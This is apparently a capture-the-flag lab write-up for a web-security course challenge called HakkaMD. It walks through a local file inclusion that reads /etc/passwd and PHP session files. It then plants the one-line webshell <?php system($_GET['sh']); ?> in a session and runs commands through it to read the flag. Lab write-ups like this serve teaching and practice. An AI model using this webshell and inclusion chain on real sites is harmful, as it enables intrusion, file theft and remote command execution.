Simple Web 0x07(Lab - `HakkaMD`)

Posted on | Post modified | In |

Simple Web 0x07(Lab - HakkaMD)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:8401

Background

資安這條路-Local File Inclusion

Exploit - LFI to RCE

  1. First things first, the website has LFI problem http://h4ck3r.quest:8401/?module=/etc/passwd
  2. **通靈**

    It provided phpinfo() so that we can check the save address of session. The setting is default, thus we can use LFI to read session file: http://h4ck3r.quest:8401/?module=/tmp/sess_0qvmvnk5lh140239e6ol9l16h1 We can see that session file store the data of what we enter. Therefore, we could enter webshell to get shell

  3. webshell <?php system($_GET['sh']); ?>http://h4ck3r.quest:8401/?module=/tmp/sess_2f0dilri9ju4553th2bkclefal&sh=ls%20/http://h4ck3r.quest:8401/?module=/tmp/sess_2f0dilri9ju4553th2bkclefal&sh=cat%20/flag_aff6136bbef82137
  4. Then we got flag!!!